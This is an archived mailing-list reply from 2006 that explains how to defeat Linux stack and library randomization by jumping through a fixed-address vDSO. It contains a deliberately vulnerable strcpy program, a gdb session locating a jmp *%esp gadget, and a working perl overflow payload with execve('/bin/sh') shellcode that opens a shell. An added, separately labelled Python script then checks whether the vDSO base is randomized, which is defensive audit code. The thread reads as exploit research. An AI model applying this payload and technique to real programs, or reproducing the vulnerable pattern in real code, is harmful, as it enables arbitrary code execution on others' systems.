Vulnerability Development mailing list archives
Re: Beating memory address randomization (secuirty) features in Unix/Linux
From: xgc () gotfault net
Date: 29 Mar 2006 20:02:38 -0000
To bypass VA Space Randomization on Linux:

[~/tmp] $ more stack.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buf[256];
    strcpy(buf, argv[1]);
    return 1;
}
[~/tmp] $ gcc -o stack stack.c
[~/tmp] $ ldd stack
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/tls/libc.so.6 (0xb7e32000)
        /lib/ld-linux.so.2 (0xb7f70000)
[~/tmp] $ ldd stack
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/tls/libc.so.6 (0xb7e72000)
        /lib/ld-linux.so.2 (0xb7fb0000)
[~/tmp] $

As you can see, linux-gate.so.1 is linked into the stack program and its address isn't randomized. In this address range there are a lot of instructions, mainly JMP *%ESP, which can be used to point to the stack and execute arbitrary code.

[~/tmp] $ gdb ./stack -q
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x80483a1
(gdb) run
Starting program: /home/xgc/tmp/stack

Breakpoint 1, 0x080483a1 in main ()
(gdb) x/i 0xffffe75f
0xffffe75f:     jmp    *%esp
(gdb)

A proof of concept is shown below:

[~/tmp] $ !gdb
gdb ./stack -q
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) x/i main+3
0x804839b <main+3>:     sub    $0x108,%esp
(gdb) printf "%d\n", 0x108
264
(gdb) run `perl -e 'print "A"x260,"BBBB"'`
Starting program: /home/xgc/tmp/stack `perl -e 'print "A"x260,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/i 0xffffe75f
0xffffe75f:     jmp    *%esp
(gdb) run `perl -e 'print "A"x260,"\x5f\xe7\xff\xff","\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/xgc/tmp/stack `perl -e 'print "A"x260,"\x5f\xe7\xff\xff","\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
sh-3.1$ uname -na
Linux localhost 2.6.12.5-vs2.0 #1 SMP Tue Aug 23 16:21:23 CEST 2005 i686 GNU/Linux
sh-3.1$

At EIP we set the address which jumps to ESP. It will then look at the next instructions, where the shellcode sits.

"Does anyone know if there are any articles related to this on the web?"

Yes, there is a paper from izik at:
http://www.tty64.org/doc/smackthestack.txt

- dx
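The weakness dx relies on is that the vDSO (linux-gate.so.1, shown as [vdso] in /proc/PID/maps) sat at the same address in every process on that 2.6.12 kernel, so it was not covered by the stack/libc randomization the ldd output demonstrates. The check below is an added example, not code from the post or from any project: it parses /proc/PID/maps dumps from several independent runs and reports whether the [vdso] base is pinned or moves. The sample dumps, the inode numbers in them and the helper names (vdso_base, assess, live_snapshots, randomize_va_space) are constructed for this illustration; only the addresses mirror the ldd output above.

```python
"""Audit helper: is the vDSO base fixed across processes, or randomized?

A pinned [vdso] mapping (0xffffe000 on the i386 kernel in the post) is a
stable source of code addresses that defeats the benefit of randomizing the
stack and libraries.  Later kernels randomize the vDSO base when
kernel.randomize_va_space is 2; this script lets you verify that on a host.
Constructed example, not part of the original mailing-list post.
"""
import re
import subprocess

# /proc/PID/maps line: address-range perms offset dev inode [pathname]
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S+)\s+\S+\s+\S+\s+\S+\s*(.*)$"
)


def vdso_base(maps_text):
    """Return the start address of the [vdso] mapping, or None if absent."""
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if m and m.group(4).strip() == "[vdso]":
            return int(m.group(1), 16)
    return None


def assess(snapshots):
    """Compare vDSO bases across maps dumps taken from separate processes.

    Returns (bases, verdict) where verdict is one of:
      "fixed"      - every run saw the same base (the situation in the post)
      "randomized" - the base moved between runs
      "no-vdso"    - at least one dump had no [vdso] mapping
    """
    bases = [vdso_base(s) for s in snapshots]
    if any(b is None for b in bases):
        return bases, "no-vdso"
    if len(set(bases)) == 1:
        return bases, "fixed"
    return bases, "randomized"


def live_snapshots(n=5):
    """Spawn n fresh processes and collect their own maps (Linux only).

    Each `cat` is a new process, so each dump reflects a fresh layout.
    """
    return [
        subprocess.run(["cat", "/proc/self/maps"], capture_output=True,
                       text=True, check=True).stdout
        for _ in range(n)
    ]


def randomize_va_space():
    """Current kernel.randomize_va_space value, or None if unreadable."""
    try:
        with open("/proc/sys/kernel/randomize_va_space") as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return None


# Constructed i386-style dumps.  Two runs where libc moves but [vdso] does not
# (what the ldd output in the post shows), and two runs where [vdso] moves too.
FIXED_RUNS = [
    "08048000-08049000 r-xp 00000000 03:01 12345 /home/xgc/tmp/stack\n"
    "b7e32000-b7f5a000 r-xp 00000000 03:01 67890 /lib/tls/libc.so.6\n"
    "bffeb000-c0000000 rw-p 00000000 00:00 0 [stack]\n"
    "ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]\n",
    "08048000-08049000 r-xp 00000000 03:01 12345 /home/xgc/tmp/stack\n"
    "b7e72000-b7f9a000 r-xp 00000000 03:01 67890 /lib/tls/libc.so.6\n"
    "bfd1c000-bfd31000 rw-p 00000000 00:00 0 [stack]\n"
    "ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]\n",
]
RANDOM_RUNS = [
    "08048000-08049000 r-xp 00000000 03:01 12345 /home/xgc/tmp/stack\n"
    "b7e32000-b7f5a000 r-xp 00000000 03:01 67890 /lib/tls/libc.so.6\n"
    "b7fb1000-b7fb2000 r-xp 00000000 00:00 0 [vdso]\n"
    "bffeb000-c0000000 rw-p 00000000 00:00 0 [stack]\n",
    "08048000-08049000 r-xp 00000000 03:01 12345 /home/xgc/tmp/stack\n"
    "b7e72000-b7f9a000 r-xp 00000000 03:01 67890 /lib/tls/libc.so.6\n"
    "b7fd3000-b7fd4000 r-xp 00000000 00:00 0 [vdso]\n"
    "bfd1c000-bfd31000 rw-p 00000000 00:00 0 [stack]\n",
]

if __name__ == "__main__":
    for label, runs in (("constructed fixed", FIXED_RUNS),
                        ("constructed random", RANDOM_RUNS)):
        bases, verdict = assess(runs)
        print(label, [hex(b) for b in bases], verdict)
    try:
        bases, verdict = assess(live_snapshots())
        print("this host: randomize_va_space =", randomize_va_space(),
              "vdso", [hex(b) if b else None for b in bases], verdict)
    except (OSError, subprocess.CalledProcessError):
        print("live check needs Linux with /proc mounted")
```

Run it as a plain script on a host to get the live verdict; a "fixed" result with randomize_va_space set to 2 is worth investigating, since it means the kernel is not randomizing the one mapping that is present in every process.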
Current thread:
- Beating memory address randomization (secuirty) features in Unix/Linux hd12787 (Mar 28)
- Re: Beating memory address randomization (secuirty) features in Unix/Linux Yves Younan (Mar 31)
- <Possible follow-ups>
- Re: Beating memory address randomization (secuirty) features in Unix/Linux xgc (Mar 31)
- Re: Beating memory address randomization (secuirty) features in Unix/Linux Don Bailey (Mar 31)
- Re: Beating memory address randomization (secuirty) features in Unix/Linux john (Mar 31)
- Re: Beating memory address randomization (secuirty) features in Unix/Linux Don Bailey (Mar 31)